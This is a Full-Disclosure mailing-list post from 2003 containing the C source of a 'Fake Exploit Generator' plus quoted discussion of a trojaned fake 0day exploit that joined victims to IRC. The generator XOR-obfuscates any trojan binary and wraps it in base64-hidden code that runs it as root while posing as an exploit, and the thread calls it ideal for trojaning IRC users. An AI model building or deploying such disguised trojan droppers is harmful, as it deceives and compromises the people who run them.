On Friday 13 June 2003 06:51 pm, David Bernick wrote: Well anyway, I got inspired:
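// Fake Exploit Generator
// [EMAIL PROTECTED]
//
// Reads a "trojan" binary, XORs every byte with a numeric key and writes a C
// source file (fakeexp.c) made of: a base64-encoded header (decoded below),
// "#define MAX <key>", the XORed bytes as a `shellcode` string literal, and a
// base64-encoded body (decoded below).  The body, once decoded, is a program
// that refuses to run unless getuid()==0, writes shellcode^MAX to a tmpnam()
// file, chmod(0755)s it, system()s it and unlink()s it.
//
// NOTE(review): the embedded body is kept verbatim (it is a runtime string),
// so its own defects -- tmpnam()+fopen() symlink/TOCTOU race, a zero-length
// `char byte[0]` written through fwrite(), and sizeof(shellcode) including the
// string's terminating NUL so one extra byte is emitted -- are NOT fixed here;
// they would need the blob re-encoded.  Only the generator itself is repaired.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* True if c is not a base64 alphabet character; on success p points at it. */
#define badchar(c,p) (!(p = memchr(b64string, c, 64)))
#define BEAUTIFY "indent"

char b64string[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* base64 of the generated file's banner and #include lines. */
static char header[] = {
	"Ly8gZ2VuZXJhdGVkIHdpdGggRmFrZSBFeHBsb2l0IEdlbmVyYXRvciA6OiBnbWxAcGhyaWNr"
	"Lm5ldAoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1"
	"ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4K"
};

/* base64 of the generated file's usage()/setup()/main() (see file comment). */
static char body[] = {
	"dm9pZCB1c2FnZShpbnQgYXJncywgY2hhciAqc2VsZikKewoJaWYoZ2V0dWlkKCkgIT0gMCkK"
	"CXsKCQlwcmludGYoIlRoaXMgcHJvZ3JhbSByZXF1aXJlcyBwcml2aWxlZGdlcyB5b3UgZG8g"
	"bm90IHBvc2Vzcy5cbiIpOwoJCWV4aXQoMCk7Cgl9CgllbHNlCgl7CgoJCWlmKGFyZ3MgPCAy"
	"KQoJCXsKCQkJcHJpbnRmKCJ1c2FnZTogJXMgPHRhcmdldD5cbiIsIHNlbGYpOwoJCQlleGl0"
	"KDApOwoJCX0KCX0KCn0KCnZvaWQgc2V0dXAoKQp7CgljaGFyICp0bXA7CglGSUxFICpmcDsK"
	"CWNoYXIgYnl0ZVswXTsKCWludCBpOwoKCXRtcCA9IHRtcG5hbShOVUxMKTsKCWZwID0gZm9w"
	"ZW4odG1wLCAidyIpOwoJaWYoZnApCgl7CgkJZm9yKGkgPSAwOyBpIDwgc2l6ZW9mKHNoZWxs"
	"Y29kZSk7IGkrKykKCQl7CgkJCWJ5dGVbMF0gPSBzaGVsbGNvZGVbaV0gXiBNQVg7CgkJCWZ3"
	"cml0ZShieXRlLCAxLCAxLCBmcCk7CgkJfQoJCWZjbG9zZShmcCk7CgkJY2htb2QodG1wLCAw"
	"NzU1KTsKCQlzeXN0ZW0odG1wKTsKCQl1bmxpbmsodG1wKTsKCX0KfQoKaW50Cm1haW4gKGlu"
	"dCBhcmdjLCBjaGFyICphcmd2W10pCnsKCXVzYWdlKGFyZ2MsIGFyZ3ZbMF0pOwoJc2V0dXAo"
	"KTsKCS8vIGRvIHNvbWUgc2hpdCBoZXJlCn0K"
};

/*
 * Value of one base64 symbol.  '=' decodes to 0 (the caller accounts for it
 * as padding); any character outside the alphabet yields -1.
 */
static int b64val(unsigned char c)
{
	const char *p;

	if (c == '=')
		return 0;
	if (badchar(c, p))
		return -1;
	return (int)(p - b64string);
}

/*
 * Decode len base64 characters from `from` into `to`, NUL-terminating the
 * result.  len must be the text length (NOT sizeof a string literal, which
 * counts the terminator) and a multiple of 4.
 *
 * Returns the number of decoded bytes minus the trailing '=' padding, or -1
 * if a non-alphabet character is met or len is not a multiple of 4.  On the
 * latter error the quanta seen so far have already been written to `to`.
 */
long b64dec(char *to, char *from, unsigned int len)
{
	char *top = to;
	int padding = 0;

	for (; len >= 4; len -= 4, from += 4) {
		int q[4];
		int i;

		for (i = 0; i < 4; i++) {
			q[i] = b64val((unsigned char)from[i]);
			if (q[i] < 0)
				return -1;
		}
		/* Only the last two symbols of a quantum may be padding; a
		 * non-'=' symbol resets the count, as in the original. */
		if (from[2] == '=')
			padding++;
		else
			padding = 0;
		if (from[3] == '=')
			padding++;
		else
			padding = 0;

		*top++ = (char)((q[0] << 2) | (q[1] >> 4)); /* 1111 1100 | 0000 0011 */
		*top++ = (char)((q[1] << 4) | (q[2] >> 2)); /* 1111 0000 | 0000 1111 */
		*top++ = (char)((q[2] << 6) | q[3]);        /* 1100 0000 | 0011 1111 */
	}
	*top = 0;
	if (len)
		return -1;
	return (top - to) - padding;
}

/*
 * Write byte c to fp as a C "\xNN" escape.  Going through unsigned char gives
 * the same two hex digits for every value regardless of char signedness; the
 * original sign-extended negative bytes through "%x" and fished the last two
 * characters out of a scratch buffer.
 */
void printhex(char c, FILE *fp)
{
	fprintf(fp, "\\x%02x", (unsigned)(unsigned char)c);
}

#ifdef BEAUTIFY
/*
 * Run BEAUTIFY on path.  Uses fork/exec with the path as a single argv element
 * instead of system(): shell metacharacters in the file name are never
 * interpreted, and there is no command buffer to size (the original sized its
 * buffer with sizeof(argv[2]) -- a pointer width -- and sprintf'd into it).
 * Best effort, like the original: failure to run the tool is ignored.
 */
static void run_beautifier(const char *path)
{
	pid_t pid = fork();

	if (pid == 0) {
		execlp(BEAUTIFY, BEAUTIFY, path, (char *)NULL);
		_exit(127);
	}
	if (pid > 0)
		waitpid(pid, NULL, 0);
}
#endif

/*
 * usage: prog trojan fakeexp.c key
 *
 * Produces fakeexp.c from the trojan binary and key (see file comment).
 * Exits 0 after printing usage when arguments are missing; returns 1 if the
 * key is not an integer, a file cannot be opened, or an embedded blob does
 * not decode.
 *
 * Fixes over the original: the trojan is read with fgetc()/EOF instead of a
 * feof() loop (which emitted the last byte twice), the string literal is only
 * closed when one is open (a multiple-of-16 input used to leave an unterminated
 * `"` before `};`), the key is validated because it is pasted verbatim into
 * the generated source, fopen() failures are reported instead of silently
 * running the beautifier on a file that was never written, and the decoders are
 * given the text length rather than sizeof (which made them return -1).
 */
int main(int argc, char *argv[])
{
	int rc = 1;
	FILE *trojan = NULL;
	FILE *fakeexp = NULL;
	char *out = NULL;
	char *end;
	long key;
	int ch;
	int count = 0;

	if (argc < 4) {
		printf("usage: %s trojan fakeexp.c key\n", argv[0]);
		printf("ex: %s trojan fakeexp.c 187\n", argv[0]);
		exit(0);
	}

	/* The key text becomes "#define MAX <key>" in the output, so accept
	 * only a plain integer; only its low 8 bits ever affect the XOR. */
	errno = 0;
	key = strtol(argv[3], &end, 10);
	if (end == argv[3] || *end != '\0' || errno == ERANGE) {
		fprintf(stderr, "%s: key must be an integer\n", argv[0]);
		return 1;
	}

	trojan = fopen(argv[1], "rb");
	if (!trojan) {
		perror(argv[1]);
		goto out;
	}
	fakeexp = fopen(argv[2], "w");
	if (!fakeexp) {
		perror(argv[2]);
		goto out;
	}
	/* Decoded text is under 3/4 of the encoded length plus a NUL, and body
	 * is the longer of the two blobs, so one buffer serves both. */
	out = malloc(sizeof(body));
	if (!out) {
		perror("malloc");
		goto out;
	}

	/* sizeof counts the terminating NUL; the decoder wants the text length. */
	if (b64dec(out, header, sizeof(header) - 1) < 0) {
		fprintf(stderr, "%s: embedded header does not decode\n", argv[0]);
		goto out;
	}
	fprintf(fakeexp, "%s", out);
	fprintf(fakeexp, "\n#define MAX\t%ld\n\n", key);
	fprintf(fakeexp, "static char shellcode[] = {\n");

	/* 16 bytes per string-literal line, each byte XORed with the key. */
	while ((ch = fgetc(trojan)) != EOF) {
		if (count == 0)
			fputc('"', fakeexp);
		printhex((char)((ch ^ key) & 0xff), fakeexp);
		if (++count == 16) {
			fputs("\"\n", fakeexp);
			count = 0;
		}
	}
	if (ferror(trojan)) {
		perror(argv[1]);
		goto out;
	}
	if (count)
		fputs("\"\n", fakeexp);
	fputs("};\n\n", fakeexp);

	if (b64dec(out, body, sizeof(body) - 1) < 0) {
		fprintf(stderr, "%s: embedded body does not decode\n", argv[0]);
		goto out;
	}
	fprintf(fakeexp, "%s", out);

	/* fclose flushes; a failure here means fakeexp.c is incomplete. */
	if (fclose(fakeexp) != 0) {
		perror(argv[2]);
		fakeexp = NULL;
		goto out;
	}
	fakeexp = NULL;
	rc = 0;

#ifdef BEAUTIFY
	run_beautifier(argv[2]);
#endif

out:
	free(out);
	if (trojan)
		fclose(trojan);
	if (fakeexp)
		fclose(fakeexp);
	return rc;
}

> > Wow, I'd never run something that had a printf statement in it with >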
> > > print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake > > 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: > > ".$nick.": command\n"; > > > > if you run this you deserve to get owned. this guy could have at least > > xor'd the strings and base64 encoded them or SOMETHING. > > the printf statement is in the shellcode. if you don't know C and/or hex > very well it looks semi-legit. The attached perl code is the decoded shell > code, it's not in the actual "exploit". This is the perfect kind of > program to trojan little hacker wannabes on IRC. > > and no one deserves to be owned. They just need to pay for highly paid > security consultants instead (shhh..kidding). > > d > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html